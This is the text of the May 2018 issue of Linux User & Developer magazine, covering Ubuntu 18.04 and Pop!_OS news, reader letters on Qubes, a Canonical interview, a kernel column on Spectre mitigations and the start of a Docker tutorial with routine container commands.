Linux User & Developer 191 - Control Containers
www.linuxuser.co.uk
New Ubuntu!
Scripting: Perfect configs for Ansible & Puppet
Special report: Pi 3 B+ - expert projects to try
> Super-size Pi storage
Tutorials
> Git: Master version control
> Make an assistant AI with Mycroft Core
> Arduino: DIY coffee maker
> Security: Stop root attacks
Welcome
Future PLC Quay House, The Ambury, Bath BA1 1UA
Editorial
Editor Chris Thornett
[email protected]
01202 442244
Designer Rosie Webber
Production Editor Ed Ricketts
Contributors
Dan Aldred, Joey Bernard, Christian Cawley, John Gowers, Toni Castillo Girona, Jon Masters, Bob Moss, Paul O'Brien, Mark Pickavance, Calvin Robinson, Mayank Sharma, Alex Smith
In this issue
Issue 191, May 2018

32 Ruby is alive and well: The venerable language may be 25 years old, but it's still going strong
40 Containers: Server to Cloud, Containers and Core - see how it can make your computing life easier and more secure
52 Programming: Rust: An introduction to systems programming with the 'safe C'
facebook.com/LinuxUserUK | Twitter: @linuxusermag
94 Free downloads: We've uploaded a host of new free and open source software this month
Practical Pi
72 Pi Project: PipeCam - Electronics technician Fred Fourie wanted to build an affordable underwater camera rig using inexpensive and easily sourceable components. His ingenious solution, PipeCam, involved a Raspberry Pi - and plenty of waterproof sealant
74 Boot your Pi 3 B+ from USB - You might not know it, but the new Pi 3 B+ can be booted from a USB-connected drive rather than an SD card. Find out how to set it all up

Reviews
81 Group test: Security distros - We put four specialised builds that promise enhanced security to the test to see which keeps you the safest
86 Reviews: Hardware - How well do the TerraMaster F4-420 NAS and the Trendnet TEW-817DTR portable wireless router perform?
88 Distros: MX Linux 17.1 - A joint effort between the antiX and MEPIS communities which touts a clean and slick desktop experience

Back page
96 Happy Forever Day - Another intriguing short story from sci-fi author Stephen Oram
06 News & Opinion | 10 Letters | 12 Interview | 16 Kernel Column
security
Distro feed
Top 10
(Average hits per day, 30 days to 6 April 2018)
1. Manjaro 3248
2. Mint 2806
3. Ubuntu 1887
4. Debian 1526
5. elementary 1325
6. Solus 1290
7. MX Linux 1225
8. Fedora 968
9. Zorin 862
Memory leaks have most famously affected browsers in the past, so the idea that a desktop environment should be subject to one of these resource-draining bugs is surprising. But GNOME Shell 3.26.2, which is most commonly found in Ubuntu 17.10, has a leak that has been spotted by a number of users, and reported as a bug.

It appears the bug is triggered by performing actions with an associated animation. Things such as opening the overview, minimising windows or simply switching them can result in a system that grinds to a halt after a few hours of use, hitting productivity. That's not ideal, especially if you're using a laptop; you can't just reboot your way out of trouble if the added load has also drained your battery.

Once triggered, RAM use increases minute by minute. The problem is best illustrated by launchpad.net user Jesus225: "No matter what you do, gnome-shell eats up RAM slowly… After one day of usage (just web browsing) gnome-shell increased RAM usage from 100M to 350M. It does not free it up even if you close all windows. In my 4GB machine, it means that either I restart every day or I start facing swap issues the second day", they said.

Subsequent investigation has proved that the problem does indeed exist, summarised best by developer Georges Basile Stavracas: "I suspect we're leaking the final buffer somewhere". He has traced the issue, noting that "something is going on with the Garbage Collector." Garbage collection, a technique for automatic resource recovery, has been used for over 65 years, so a failure here might be seen as somewhat embarrassing.

Attempting to unpack the issue, Stavracas reported that after giving up hope, "I found a very interesting behavior that I could reproduce […] Triggering garbage collection was able to reduce the amount of memory used by GNOME Shell to normal levels."

It's perhaps surprising that it took so long for the bug to be spotted, but will the fix be ready in time for Ubuntu 18.04 LTS?

Highlights
TrueOS
TrueOS prides itself on being easy to install, with a graphical installation system and a good number of pre-configured desktop environments.
OpenBSD
Security-focused, OpenBSD 6.3 features ISO support in the virtual machine daemon, updates to LibreSSL and OpenSSH, and SMP for ARM64 systems.
NetBSD
This popular implementation of the Berkeley Software Distribution is a lightweight OS designed to work on a wide range of hardware platforms.
Latest distros available: filesilo.co.uk
gaming
"It's true Steam Machines aren't exactly flying off the shelves… we're still working hard on making Linux operating systems a great place for gaming and applications. We think it will ultimately result in a better experience for developers [and] benefit the Linux ecosystem at large." Among these improvements are investment in the Vulkan graphics API and shader pre-caching. Steam Machines or not, Valve isn't giving up on Linux just yet.
hardware
Intel discontinues its graphics updater
Many new distros just don’t need it any more
As Linux distributions develop and improve, it isn't unusual for third-party tools and software to adapt. The Intel Graphics Update Tool is a good example. Released in 2013 to give Linux users a safe and reliable way to install and upgrade to stable drivers and firmware on Intel graphics hardware, five years down the line the software has become largely redundant.

The Intel graphics blog announced on 8 March that "users will notice Fedora 27 and Ubuntu 17.10 and beyond are very current. Therefore, we are discontinuing the Update Tool as of version 2.0.6. The final version 2.0.6 of the update tool was targeted specifically at both Ubuntu 17.04 and Fedora 26. Earlier revisions for those Linux distributions are no longer being supported."

Previously known as the Intel Graphics Installer for Linux, the tool was used widely on systems with Intel graphics. Typically laptops, some desktops and many all-in-ones also rely on Intel graphics. So with the update tool put out to pasture, how will you keep your Linux system's graphics up to date? Is a new laptop or GFX card required?

In the case of Ubuntu and Fedora at least, the inclusion of Intel graphics support in these distributions (and downstream) means that the update tool is no longer required. With other distros, the case isn't so clear-cut. Over the years, many users have relied on the Intel graphics support forum for help and assistance. This will not immediately close; the blog announced that the forum will be maintained for a while, before being reconfigured as an archive. Users running older distros and hardware will be hit hardest by this, so upgrade wherever possible.
distro update

Before Pop!_OS, our attention was focused on ensuring our computer hardware ran flawlessly with Linux. When the end of Unity was announced last year, it created a lot of unknowns among the team; but what started as an unknown quickly became an opportunity. For over 12 years, we had been outsourcing one of System76's most important customer interactions, the desktop experience - and during this tenure, we collected tons of data: a list of customer requests for an improved desktop interface.

Linux excels in the fields of computer science, engineering and DevOps - this is where our customers live. It's important for us to make sure we create the most productive computer environment for them to be efficient, free and creative. During the first Pop release, we addressed the most common pain-points we heard from customers with the Linux desktop: the initial user setup time, bloatware, the need for up-to-date drivers and software, and a fast and functional app center.

Additionally, it was important that Pop!_OS provided a pleasant experience for non-System76 customers. This meant ensuring Pop!_OS was lighter, faster and more stable than the experience people were used to. If Pop!_OS can turn unusable machines into working units, this is a win for a maker. It means wider accessibility, enabling anyone to create a project using a more powerful desktop interface.

It's with the second launch, 18.04, where we really start to make an impact. So what's different?

Heightened security
Pop!_OS encrypts your entire installation by default. Our new installer also enables full-disk encryption for pre-installs that ship from System76 or another OEM. System76's laptops that use Pop!_OS also receive a feature that provides automatic firmware updates, ensuring the PC is always secure and reliable.

Performance management
18.04 includes an improved battery-level indication so users can stay on top of their remaining power. We've also added a CPU and GPU toggle to switch between power profiles from the system menu, such as NVIDIA Optimus, energy-saving, high-performance and others.

New installer experience
The new installer is designed with a story arc of artwork that carries you through the installation and permeates through the operating system. The installer does four things: enables us to ship computers with full-disk encryption; simplifies the installation process; installs extremely fast; and demonstrates the artwork and style that will begin to permeate other areas of the operating system, as seen in the new Pop!_Shop artwork.

USB flashing utility
Popsicle is a new utility that launches when you double-click an ISO in the file manager. It is a USB startup disk creator that can flash one or many hundreds of USB drives at once.

Other new features include a Do Not Disturb switch to nix notifications, easy HiDPI and standard DPI switching for mixed displays or legacy applications, curated applications in the Pop!_Shop with new artwork, and systemd-boot and kernelstub replace GRUB on new UEFI installs.

18.04 was a result of maintaining inclusion and collaboration from the Pop!_OS community team, working with elementary OS on the new Linux installer and, of course, the massive amount of work that occurs upstream in GNOME, Ubuntu, Debian, the kernel and countless other projects. There was a lot of testing required in order to ensure Pop!_OS was compatible across various types of hardware configurations.

One of the things we're most grateful for is having such an active Pop!_OS community, which has been energetic in providing feedback. We'd like to continue improving the OS as a tool to enhance your workflow productivity and we always welcome more feedback. So give Pop a try at https://system76.com/pop and tell us what you need at www.reddit.com/r/pop_os.

Carl Richell
Carl is the founder and CEO of System76, a manufacturer of Linux computers.
Comment
Your letters
Questions and opinions about the mag, Linux and open source
Qubes tips
Dear LU&D, I enjoyed the Qubes OS tutorial in LU&D189 (Features, p60), and thought I would share with you three glitches that might put some newcomers off.

Firstly, the installer seems to offer no way to overwrite a previous OS (in my case, Windows 10) and instead tried to squeeze the install into some free space. This meant I had to create a live USB (I used Mint) just to use its Disks program to delete the partitions. Other readers may benefit from planning this in advance.

Having got past that hurdle I felt some newcomers might be perturbed by the uneven progress of the installation, which apparently counts files not megabytes, and thus appears to 'stall' while installing large files like the templates. The workaround is not to watch too closely: trust that the number of files will increment again if you leave it for twenty or thirty minutes.

After a reboot I had the chance to select optional templates, and these took a while to install, with a progress bar that travelled from side to side during the process. After playing with Qubes and deciding to use it seriously, I noted from the tutorial that a new version was imminent. I thought that I would do a fresh install of Qubes 4.0 and downloaded it.

This version has a similarly uneven progress bar at the install stage, and after the reboot the side-to-side motion of the second progress bar froze completely. Leaving the computer for an hour or so, when I came back it had nonetheless completed its configuration.

The moral again is, don't panic! Do not assume because the progress gauge freezes that the process has 'hung'. Have a cuppa or even a meal before giving up! Anyway, many thanks for the tutorial and I hope my comments might encourage others to persevere with a couple of glitches that turn out to be purely cosmetic, and to reassure them that once installed the default config is much more reliable than the slightly uneven installer.
River Att

Chris: Great advice there. Personally, I've not experienced the problem you mentioned with being unable to overwrite a Windows OS. In Qubes R3.2's Installation Summary, under the System option you can select custom partitioning. On the next screen I was able to choose 'I will configure partitioning' and use a manual partitioning GUI to remove existing OS partitions and create the required partitions for Qubes OS (as you would do in GParted). However, this may be an issue with Windows, as we're usually deleting Linux distros when installing.

Regarding 4.0, we were holding on for the RC4 to be confirmed as the final, but it didn't come in time for our disc deadline, unfortunately. It turned out that the project released an RC5 before going on to full release, so it was probably the right call. Fortunately, Qubes OS 3.2 is being supported for a further year after 4's release, rather than the usual six months, because of the new hardware certification requirements for Qubes 4.0. We would suggest that if you want to follow the tutorial you should use 3.2, but for general use we'd recommend grabbing the latest release.

Right Keep calm and install Qubes: good advice from one of our readers
top tweet
MX Linux is an up-and-coming distro, but this quick straw poll told us that it probably needed a little profile-raising help. It's on the disc, so try it out!

The missing middle
I love your magazine and have read it since I first decided to try Linux, and bought it with the Ubuntu 16.04 cover disc to use as my first Linux OS. I've now moved away from Ubuntu and happily swap between (admittedly
Interview: Canonical

The release of Bionic Beaver is important. Not only is it the LTS - with five years' worth of support - that will see millions of users installing Ubuntu for the first time with GNOME firmly nestled in the desktop environment slot, but it could be the release that sees Canonical through IPO. We spoke to the team in early April about the overall goals for Ubuntu 18.04 LTS.

Will Cooke
Will is the desktop director at Canonical, who oversees putting the desktop ISO together.
David Britton
David is the engineering manager of Ubuntu Server at Canonical.

Top Right You can try Communitheme with an early snap by installing it with snap install communitheme or wait for 18.10. Once installed just log out and select it from the cog options

WILL COOKE: Typically, we find that most of our users like to install it once, and then leave it alone, and know that it'll be looked after itself. That's more important in the cloud environment than it is on the desktop, perhaps. But the joy of Ubuntu is that you can do all of [your] development on your machine, and then deploy it to the cloud, running the same version of Ubuntu, and be safe in the knowledge that the packages that are installed on your desktop are exactly the same as the ones that are in your enterprise installation.

When you've got thousands of machines deployed in the cloud in some way, the last thing you want to be doing is maintaining those every single year and upgrading it, and dealing with all the fallout that happens there. So the overarching theme for Ubuntu 18.04 is this ability to develop locally and deploy to your servers - the public cloud, to your private cloud, whatever you want to do - your servers. But also edge devices, as well.

So we've made lots of advances in our Ubuntu Core products [see p68], which is a really small, cut-down version of Ubuntu, which ships with just the bare minimum that you need to bring a device up and get it on the network. So the packages that you can deploy to your service, to your desktop, can also be deployed to the IoT devices, to the edge devices, to your network switches. That gives you a really unparalleled ability and reliability to know that the stuff you're working on can be packaged up, pushed out to these other devices, and it will continue to work in the same way that it works on your desktop.

A key player in that story is the snap packages that we've been working on. These are self-contained binaries that work not only on Ubuntu, but also on Fedora or CentOS or Arch. So as an application developer, for example, not a desktop application necessarily, but it could be a web app, it could be anything - you can bundle up all of those dependencies into a self-contained package, and then push that out to your various devices. And you know that it will work, whether they run Ubuntu or not. That's a really powerful message to developers: do your work on Ubuntu; package it up; and push it out to whatever device that is running Linux, and you can be reliant on it continuing to work for the next five years.

What's the common problem that devs have with DEBs and RPMs that has led to the snaps format?
WC: There are a few. Packaging DEBs - or RPMs, for that matter - is a bit of a black art.
Quick guide
Beyond 18.04: GNOME Shell 4
Wayland, the display server protocol, wasn't stable enough to be the default for Ubuntu 18.04 LTS, but it's definitely coming and will benefit from other technologies that are being worked on. As well as PipeWire (for improving video and audio under Linux), we're likely to see an architecture change with GNOME Shell 4. However, things aren't that simple, as Will Cooke explained: "GNOME Shell 4 shell is a bit of a strange topic. GNOME tell me they have never said there is going to be a GNOME Shell 4. There will be a GNOME 4 - you know, a new version of all the libraries and all the applications and all that kind of thing. But they haven't actually committed to doing a whole new shell or changing the way that it works."

One of the ideas for GNOME 4 is to significantly change the experience during a display server crash. For example, if the display server crashes while you are working on a LibreOffice document, there's a chance that it may not be auto-saved, and you'll lose all of that work: "At the moment, if the compositor Mutter in the GNOME stack crashes in Wayland, it crashes Wayland and it crashes your entire session. So you're thrown back to the login screen, and all of the applications that you're running get killed and you're back in the position of just switching your machine on."

One of the considerations for GNOME 4 is to make a crash play out more like X.Org in the future: "The display server can restart and the shell can restart, and all of the applications will continue running in the background. So you might not even notice that there was a problem."

Above Regardless of the confusion over GNOME Shell 4's existence, Canonical seems confident that the new shell will bring a change to how Wayland deals with display server crashes
There's a certain amount of magic involved in that. And the learning process to go through it, to understand how to correctly package something as a DEB or RPM - the barrier to entry is pretty high, there. So snaps simplify a lot of that.

Again, part of the fact, really, is this ability to bundle all the dependencies with it. If you package your application and you say, "Okay, I depend on this version of this library for this architecture," then the dependency resolution might take care of that for you. It probably would do. But as soon as your underlying OS changes that library, for example, then your package breaks. And you can never be quite sure where that package is going to be deployed, and what version of what OS it's going to end up on.

So by bundling all of that into a snap you are absolutely certain that all of your dependencies are shipped along with your application. So when it gets to the other end, it will open and run correctly.

The other key feature, in my mind, is the security confinement aspect. X.Org, for example, is a bit long in the tooth now. It was never really designed with secure computing in mind. If something is running as a root, or it's running as your user, then it has the permissions of that user that's running it. So you can install an application where the dev, for example, could go into your home directory, go into your SSH keys directory, make a copy of those, and email them off somewhere. It will do that with the same permissions as the user that's running it. And yeah, that's a real concern. With snaps and confinements, you can say, "This application, this snap, is not allowed access to those things." It physically won't be able to read those files off the disk. They don't exist as far as it's concerned. So that, in my mind, are the two key stories. The write-once, run-anywhere side of things, and then the confinement security aspect as well.

With snaps, you've got a format that allows proprietary products to come to Linux much more easily than before. Do you not feel that there's a danger that it creates no inclination to actually open up those products?
WC: At the end of the day, it's the users that are going to choose which application they want. We've seen a lot of interest in Spotify, for example. It was there anyway - we're just making it a lot easier for people to get their hands on it, and indeed they do want to get their hands on it.

From a pragmatic point of view and from a user-friendliness point of view as much as anything, given that all of the other tools that you might need… if you're a web developer [for example], there are dozens of IDEs. If what's stopping you from using Linux is that you can't use Skype or something like that, because you have to for work, then absolutely, let's solve those user cases and open it up to more and more people.

Going on to talk about aesthetics a little, I wondered how the Ubuntu community theme (Communitheme) was progressing?
WC: It's going well, yeah. So it's not quite good enough for 18.04. There's still quite a few bugs that need fixing, specifically around GTK+ 2 applications.
Quick guide
Encryption changes
In September 2017, Dustin Kirkland, former VP of Product, indicated that Canonical had done a lot of work with Google on ext4 encryption with fscrypt. Eventually, he said, they planned to deprecate eCryptfs. In fact, the release of Ubuntu 18.04 sees the removal of eCryptfs entirely, along with any option to encrypt the home drive in the 18.04 installer.

This might sound like a worrying change, but, according to Will Cooke, this was done because the service is unmaintained - or, as the Launchpad bug report elaborates, 'Buggy, under-maintained, not fit for main anymore; alternatives exist'. "It would be unfair on our users to keep ecryptfs in main for 18.04," Cooke confirmed later in an email, "if we cannot be 100% certain that it will be supportable for the duration of the LTS life."

Ubuntu's position is that full disk encryption using Linux Unified Key Setup-on-disk-format (LUKS) is the preferred method. eCryptfs has been moved from the main repo to universe, if you still want to use it. Currently, Canonical has confirmed that fscrypt is not considered mature enough to feature in 18.04, but will be a target for 20.04.

Above According to Will Cooke, eCryptfs baffled some users: "We had full disk encryption and home directory encryption… Why would I want to do one over the other?"
© 2012 eCryptfs.org
Top features of Ubuntu 18.04: page 58

other applications, and processed and streamed and all the other kinds of things. That needs those applications to support the API, and they won't do that until it's finished and is stable. So it's still relatively early in the development cycle of PipeWire. It will probably make an appearance in 18.10 - certainly 19.04. And then hopefully, the browsers, for example, will pick up on it, and integrate support for it into their packages, and then we'll be in a good place to leverage it.

NVIDIA doesn't support some of the APIs that are required for the Wayland compositors, so is Wayland ever going to reach a level of stability that's acceptable for an LTS?
WC: Yes, it will do, I'm pretty sure of that. There were some changes in the APIs which meant there was some incompatibility there. But they're being addressed. There were known issues, known bugs, and they will be fixed, no doubt about that.

So there's no question that NVIDIA is just not interested in Wayland and don't want to incorporate -
WC: No, no, they definitely care about that. But also, we've got a really good reputation with NVIDIA through their deep-learning AI side of things as well. The deep-learning stack that comes from NVIDIA, it's all built on Ubuntu. So we have a really good relationship with those guys already. And we have regular calls on these sorts of issues - not only the massive parallel processing compute side of things, but also the graphical side of things is being discussed directly with those graphics card vendors on a regular basis. So yeah, I have no doubt that we're in a good position to be able to get those bugs fixed. And they do care. They absolutely do care.

You've also been experimenting with Zstandard compression. How's that going?
DAVID BRITTON: We did some work, this cycle, to bring the latest supported version of Zstandard back to Xenial. There's also been some talk on the APT compression front, offering Zstandard as an alternative to GZIP and XZ compression and the other compression types that are there. And then possibly changing that in the 18.10, maybe 19.04 timeframe, for the default, for APT compression. We were looking at it for 18.04, but it's just a bit too early to make that kind of a change. It looks very promising, but it looks more like an 18.10 timeframe where we'll have that data.

As with the desktop, you also ran a survey for the server side of things. What responses did you get from that?
DB: Ubuntu-Minimal came out of one of those feedback requests that we did. [Another] bit of feedback that we received from the community was that the old Debian installer was just clunky and hard to navigate. So we've spent time over the past couple of cycles making a new server installer, based on that feedback. The server installer is called Subiquity, with the Desktop installer called Ubiquity. That is a new image-based installer that goes significantly faster than the old package-based installer. Also, it asks you far fewer questions. The idea is that it asks you how to configure the network, how you want to configure your disks, and then install. So that nice 'just press Enter workflow' through the program takes just a few minutes to get through, and you're done.

Moving on to other things that we got feedback on… one that's coming up is that networking has always been difficult to configure on Ubuntu. It is something that is called etc/network/interfaces or ENI, for short. That is a legacy system that spans multiple generations of Unix in different forms. In the modern world, there are two ways to configure networking. One is NetworkManager, which is used mostly on desktops and IoT devices. The other one is systemd-networkd, which is a systemd module for configuring networking, which we are targeting for the server environment.

Since there's these two different ways to configure it, they have their own little quirks. Ubuntu is launching in 18.04 a tool called netplan.io. It's a configuration generator. So you type in a very simple YAML format - how you want your network to look. It can be as simple as three lines. It will render the correct back-end networking data for either NetworkManager or systemd-networkd - whichever system you happen to be on. It kind of simplifies the way that you can view networking.

One [feature], which is a small thing, but people clamour for it: htop. Anywhere that Ubuntu Server is installed, htop will now be available and supported by Canonical. That is a big one for sysadmins who have been asking for it for a while. The last one that I wanted to bullet point was LXD 3.0, which is Canonical's supported container solution.

Above Ubuntu 18.04 benefits from GNOME 3.28's improvements to GNOME Boxes, which makes spinning up new VMs really simple, albeit with limited options
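To picture the "as simple as three lines" netplan definition David Britton describes, here is an illustrative sketch rather than anything shipped by Canonical. The file name and the interface name (eth0) are assumptions; real files live under /etc/netplan/ and your interface will likely have a different name. It declares a single DHCP-configured interface rendered for systemd-networkd:

# /etc/netplan/01-netcfg.yaml (hypothetical file name)
network:
  version: 2
  renderer: networkd
  ethernets:
    eth0:
      dhcp4: true

Running sudo netplan apply then regenerates the back-end configuration for whichever renderer is selected.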
opinion

Jon Masters
Jon is a Linux-kernel hacker who has been working on Linux for more than 22 years, since he first attended university at the age of 13. Jon lives in Cambridge, Massachusetts, and works for a large enterprise Linux vendor, where he is driving the creation of standards for energy-efficient ARM-powered servers.

Linus Torvalds has announced Linux 4.16, noting that things had calmed down sufficiently at the last minute to avoid the need for an RC8 (Release Candidate 8). Those things that had remained in flux toward the end were mostly networking-related, and the networking maintainer had explicitly said he was okay with it. The 4.16 kernel includes a number of new features, among them AMD's Secure Encrypted Virtualization (SEV), and many additional mitigations for Meltdown and Spectre security vulnerabilities across various architectures.

On the latter point, 4.16 pulled in upstream mitigations for Spectre variant 1 (bounds-check bypass) exploits. These rely upon vulnerable code sequences within the kernel that attempt to test whether an untrusted value provided by the user (that is, the application) is within a permitted range. Processing of that data should not continue unless it lies within a desired range, but many processors will speculatively continue execution beyond the check before they have completed the in-bounds test. Addressing Spectre variant 1 is currently a matter of identifying vulnerable kernel code (through a scanner) and wrapping it with one of various new macros, such as 'array_index_nospec()'. This prevents speculation beyond the bounds check in a portable manner.

At an architectural level, Meltdown mitigation using KPTI (Kernel Page Table Isolation) was merged for arm64 in 4.16, as well as support for Spectre variant 2 mitigation through branch predictor invalidation (via Arm Trusted Firmware). s390 (mainframe) gained a second mitigation for Spectre variant 2, complementing the existing support for branch predictor invalidation, using a new concept known as an 'expoline'. While x86 implements 'retpolines' (return trampolines) that make vulnerable indirect function calls appear to be not vulnerable function returns, s390 makes these indirect calls appear to be execute-type instructions exposed through the new execute trampolines.

Heavy on the security
With the release of 4.16 came the opening of the 4.17 merge window. This is the period of time, typically two weeks, during which Linus will pull vetted but potentially disruptive changes and new features into a future kernel. This culminates in a Release Candidate 1 (RC1) kernel, as it did with 4.17-rc1. The latest kernel is once again fairly heavy on the security features, including receive-side support for TLS (the kernel now has complete in-kernel TLS support), various additional capabilities in the BPF packet filter, and robustness enhancements for mounting ext4 filesystem images by untrusted users.

The latter comes with a warning from ext4 filesystem maintainer Ted Ts'o. He hopes container folks don't "hold any delusions that mounting arbitrary images that can be crafted by malicious attackers should be considered sane". Finally, 4.17 will minimally require GCC 4.5 on x86 - which is true of all Linux distros from the past few years - due to a now non-optional feature (assembly language 'goto' jump support) dependency.

Perhaps the most interesting development in 4.17, at least for me, is the removal of support for eight - yes, eight - different architectures. While Linux prides itself on being progressive and reasonably swift in adoption of support for the latest hardware, it traditionally has been less swift in the removal of support for long-dead software features and hardware devices. There are many stories over the years of Linux retaining support for hardware that is no longer available, sometimes for amusingly perverse periods of time. In some cases, this is a great thing since upstream may continue to provide a certain level of support for popular hardware even after the company that built it goes away. But in other cases, code can 'bit-rot' and simply occupy space, consuming developer time in unneeded maintenance.

This was the case with the eight architectures removed in 4.17. Arnd Bergmann had given plenty of notice of candidates for removal, ultimately working with the maintainers of blackfin, cris, frv, m32r, metag, mn10300, score and tile, to remove them from upstream Linux. Of these, it's likely that few people will have even heard of more than one or two.

As Arnd put it, "In the end, it seems that while the eight architectures are extremely different, they all suffered the same fate: There was one company in charge of an SoC line, a CPU microarchitecture and a software ecosystem, which was more costly than licensing newer off-the-shelf CPU cores from a third party (typically ARM, MIPS, or RISC-V). It seems that all the SoC product lines are still around, but have not used the custom
CPU architectures for several years at this point". In other words, the companies remain, but they're all using commodity cores at this point.
On a side note, it was recently discovered that support
for (much older) IBM POWER4 systems was accidentally
broken back in 2016. As nobody has complained about
it since then, this support has also been removed
from upstream. Of course, POWER remains a popular
architecture, with great upstream support for all of the
latest POWER8 and POWER9 hardware. Sometimes
even well-maintained architectures benefit from a little
spring-cleaning of older code.
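To make the Spectre variant 1 pattern described above a little more concrete, here is a minimal sketch of how a wrapped bounds check typically looks. It is not taken from any particular driver; the function, array and variable names are invented for illustration, and the macro lives in the kernel's <linux/nospec.h>:

/* Clamp a user-supplied index so the CPU cannot speculate past the check. */
static int read_entry(unsigned long index, unsigned long size, const int *table)
{
        if (index >= size)
                return -EINVAL;

        /* Returns 'index' when it is in range, 0 otherwise, without a
         * conditional branch the processor could speculate around. */
        index = array_index_nospec(index, size);
        return table[index];
}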
Feature Take control of containers
Back in the mists of time, Marc Andreessen coined the phrase "Software is eating the world" in an oft-quoted essay he wrote for the Wall Street Journal. In 2011 he foresaw that virtualisation and abundant hardware resources would lead to vast data warehouses and increasing systems of automation that would disrupt how every industry across the world works. Now, in 2018, almost every company needs to be a software company to compete effectively within their markets.

There are so many problems that automation can solve for us. For example, a common issue affecting network administrators is that different servers across a network can have different configurations and different versions of software packages running on them.

Tutorial files available: filesilo.co.uk
at a glance
Where to find what you're looking for
• Docker deployments (p20) Discover everything that you need to get started with creating, running and managing Docker containers on web developer workstations through to enterprise servers.
• Script with Vagrant (p22) Fully automate the creation of virtual servers and environments across different devices, machines and OSes with the help of a scripting language.
• More Vagrant providers (p24) Extending our automation of virtual server creation on enterprise platforms such as Hyper-V and VMware vSphere, as well as cloud platforms like AWS and Azure.
• Puppet provisioning (p26) Centrally manage web applications and keep server configurations synchronised across your devices and networks with this established and well-supported tool.
• Configure Ansible (p28) Set up a worthy alternative to Puppet and Chef, then use it to manage applications and configuration files across machines by writing your very own playbooks.
Puppet and Ansible can centrally manage configuration files, package versions and scripted deployments so you can tweak settings, perform upgrades and roll everything back to a 'known good' state across your entire network almost instantly.

Another problem used to be that sysadmins would have to over-provision their server resources to allow for peak loads and futureproofing. With the introduction of cloud computing and supporting systems to augment on-site infrastructure, this has become much less of an issue, but making good use of virtualisation can ensure you make even better use of existing on-site hardware resources first.

We'll be exploring Vagrant in this feature in some depth; it's a system that can automate the creation, editing, running and deletion of virtual machines across all kinds of different machines and virtualisation products. We'll also cover how it can be used to spin-up environments that are representative of 'production' on your workstation, so that you can run behaviour-driven tests against them. This means you can check that your web applications match customer requirements and pass all your continuous integration tests before you even push your code to version control. In the long run this means fewer bug tickets, more stable production environments and less time spent puzzling out what a mysterious log entry means during a critical outage.

We'll also look at Docker. This technology packages individual applications into a container that's far more lightweight than a virtual machine. This means developers can spin-up containers without setting up an entire development environment, and emulate the network infrastructure and dependent components that their scaled applications will be relying on once those apps are released.

Sysadmins will also be particularly excited about containerisation because it means that when developers decide to use technologies that aren't already supported internally (such as NodeJS, the Go language, Python 3 and so on), you no longer have to deal with a kind of 'dependency hell' on your existing server operating systems, or puzzle out from patchy documentation how to successfully install an application. Simply deploy the container on your server and it should work exactly the same way it did for the original developer, in any environment you choose to deploy it in.

The other great thing about automation, virtualisation and containerisation is resilience. If an application goes down it doesn't matter, because you can kill it and start another one in a matter of seconds. When your network is under peak load you can instantly provision more virtual servers to cope, then delete almost all of them as soon as it troughs.

Lastly, we haven't forgotten those of you who are just dipping your toes into Linux administration for the first time, developers living under restrictive corporate policies, or sysadmins dealing with mixed infrastructure containing Windows and Mac servers. All the technologies used throughout this feature are cross-platform, and we'll even be discussing how to use Vagrant with commercial products such as VMware vSphere and Microsoft's Hyper-V virtualisation technology.
Docker deployments
Package your applications for easy deployment and run them on any system
The central premise of Docker is that you should be able to package any application once in a 'container' and then run it anywhere without needing to install any extra dependencies. The project itself was originally released in 2013 as an add-on for the Linux kernel by Solomon Hykes, who became renowned for keeping tight control over the way the product was developed and evolved by the wider community.

The way Docker differs from a standard virtualisation system, such as Oracle VirtualBox or VMware Workstation, is that it uses the resource-isolation features of the host Linux kernel rather than just the virtualisation features of the CPU. As a result, Docker uses far less memory and processing power, and the individual application containers it generates are much smaller and easier to distribute than full-blown virtual machines packaged with their full-sized virtual hard drives.

There are two versions of Docker: the Community Edition and the Enterprise Edition. Both have the same core functionality and are licensed under the Apache License v2, but the latter comes with a support contract and the ability to run 'certified' containers on infrastructure hosted by Docker Inc. In this feature we'll be looking at the Community Edition, as anyone - regardless of whether they're a hobbyist developer or an in-house IT technician - can download and use it. Everything we cover should also work on the Enterprise Edition.

The first thing you'll need to do is install the Docker daemon that tracks the containers you launch, and the Docker client that launches them in the first place - just follow the walkthrough below. Once you have familiarised yourself with the basics you can try running a simple web server:

$ docker run --name mywebsite -P -d nginx

This creates a new Docker container called 'mywebsite' and launches a pre-configured container with Nginx (our web server) installed. There are two additional flags: -P exposes ports 80 and 443 (HTTP and HTTPS) from the container and maps them to a new value, so we can call them from the localhost domain or the IP address 127.0.0.1. -d runs the image in detached mode, so the container won't listen to any further terminal input and will keep running until you specifically choose to destroy it.

You should be able to use the same verification step from the walkthrough below to verify that the container has been created and is running as expected. The local port mapping will also be listed, so assuming port 80 on the container is mapped to 49153, for example, you can even see the web server test page in Mozilla Firefox or from the terminal with:

$ curl http://localhost:49153

However, a web server is only as good as the website it's serving. Currently all we have is an Nginx test page; we need to get some HTML files into the Docker container, and there are three ways of going about this. One would be to run the container without detached mode so we can still SSH into it and transfer files using SCP. Another would be to specify data directories when we first launch our Docker container. For example, you could map the contents of /var/www to Nginx's default web directory in Docker using:

$ docker run --name website2 -v /var/www:/usr/share/nginx/html:ro -P -d nginx

The ro in this line ensures that file contents can only be edited on the host system and not by any processes that might be running in the container.

The other way to do this is to define which files you want to copy to the container using a file called Dockerfile, with no extension. We have some examples on the coverdisc and Filesilo, but the content in this case would be:

FROM nginx
COPY content /var/www
VOLUME /usr/share/nginx/html

Once you are ready you would rebuild and run your container using

$ docker build -t mywebserverimage .
$ docker run --name mywebserver4 -P -d mywebserverimage

You should then be able to see your new website being served at the new localhost port mapping.

Now, let's say we have a more complex set of requirements, such as developing a database-driven website. Rather than manually specifying each individual container, we can use Docker Compose to automate this in a single step. On the coverdisc we have a sample Dockerfile with an Ansible provisioning script that will install Ruby on Rails with a PostgreSQL database. Once you have extracted the tarball the following pair of commands builds it:

$ docker-compose run web rails new . --force --database=postgresql
$ docker-compose build

Next replace the generated config/database.yml with our version so that Rails no longer tries to connect to the host system, then run the following in two different terminal windows:

$ docker-compose up
$ docker-compose run web rake db:create

At this point you should be able to visit the Rails welcome page via http://localhost:3000.

Above With one command in the terminal, you can have a web server up and ready for testing
Above Docker Compose makes testing database-driven sites with multiple containers easy
Above Search for more pre-built containers on Docker Hub, https://hub.docker.com/explore

quick tip
Roll your own containers
The easiest way to create your own containers is to fetch vanilla 'ubuntu' or 'coreos' and customise it with your Dockerfile. You can then use 'docker build' and 'docker save' to create and export the final product.

how to
Set up and use Docker
1 Install Docker
Find instructions on how to configure your package manager and install both the Docker daemon and client app at http://bit.ly/lud_install. If this doesn't work you could also try installing the binaries from http://bit.ly/lud_binaries.
2 Set up Docker Compose
